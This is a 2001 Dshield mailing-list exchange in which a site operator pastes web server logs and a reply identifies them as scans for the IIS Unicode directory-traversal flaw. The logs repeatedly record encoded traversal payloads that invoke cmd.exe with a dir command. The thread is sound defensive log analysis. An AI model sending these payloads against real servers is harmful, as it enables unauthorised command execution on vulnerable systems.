[Dshield] win32 exploit?

Dragos Ruiu dr at kyx.net
Sat Aug 4 01:56:56 GMT 2001


This looks like someone or something looking for vulnerable
IIS servers with the UNICODE exploit.  There are several vulnerability 
scanners that would use the cmd.exe/dir combination to look for a reply
indicating vulnerable back.

You ony need to worry if you are vulnerable, and you start seeing
commands other than dir/ping there.... well you need to worry if you're
vulnerable in any case. (Or if you're running IIS at all, imho :-)

cheers,
--dr

On Fri, 03 Aug 2001, Joseph Shraibman wrote:
> Does anyone know what this is?
> 
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
> 
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 -
> error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
> File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
> does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
> does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
> does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
> "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 
> 
> -- 
> Joseph Shraibman
> jks at selectacast.net
> Increase signal to noise ratio.  http://www.targabot.com
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www1.dshield.org/mailman/listinfo/dshield
-- 
Dragos Ruiu <dr at dursec.com>   dursec.com ltd. / kyx.net - we're from the future 
gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc




More information about the list mailing list